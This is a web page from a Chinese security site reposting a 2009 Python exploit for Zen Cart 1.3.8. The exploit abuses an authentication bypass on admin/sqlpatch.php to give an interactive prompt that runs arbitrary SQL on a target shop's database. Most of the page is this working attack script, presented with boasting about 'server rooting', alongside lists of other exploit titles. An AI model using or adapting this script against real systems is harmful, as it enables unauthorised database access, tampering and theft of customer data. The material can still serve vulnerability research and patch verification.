首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Zen Cart 1.3.8 Remote SQL Execution Exploit
来源:Bl4ck.H@gmail.com 作者:BlackH 发布时间:2009-06-24  
#!/usr/bin/python

#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
# DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
# DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
global a, b
for param in sys.argv:
if(param == '-'+name): return str(sys.argv[b+1])
b = b + 1
if(need):
print '\n#error', "-"+name, 'parameter required'
exit(1)

if (len(sys.argv) < 2):
print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
========================================================================
|                  BlackH <Bl4ck.H@gmail.com>                          |
========================================================================
|                                                                      |
| $system> python """+sys.argv[0]+""" -url <url>                                 |
| Param: <url>      ex: http://victim.com/site (no slash)              |
|                                                                      |
| Note: blind "injection"                                              |
========================================================================
"""
exit(1)

url, trick = option('url', 1), "/password_forgotten.php"

while True:
cmd = raw_input('sql@jah$ ')
if (cmd == "exit"): exit(1)
req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
print '>> success (', cmd, ")"
else:
print '>> failed, be sure to end with ; (', cmd, ")"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Zen Cart 1.3.8 Remote Code Exe
·HP Data Protector 4.00-SP1b430
·linux/x86 Shellcode Polymorphi
·HP Data Protector 4.00-SP1b430
·The Cisco ASA Web VPN versions
·Bopup Communications Server 3.
·MyBB <= 1.4.6 Remote Code Exec
·Multiple HTTP Server Low Bandw
·pmaPWN! - phpMyAdmin Code Inje
·Joomla Component com_pinboard
·Safari 3.2.3 Arbitrary Code Ex
·AlumniServer 1.0.1 (resetpwema
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved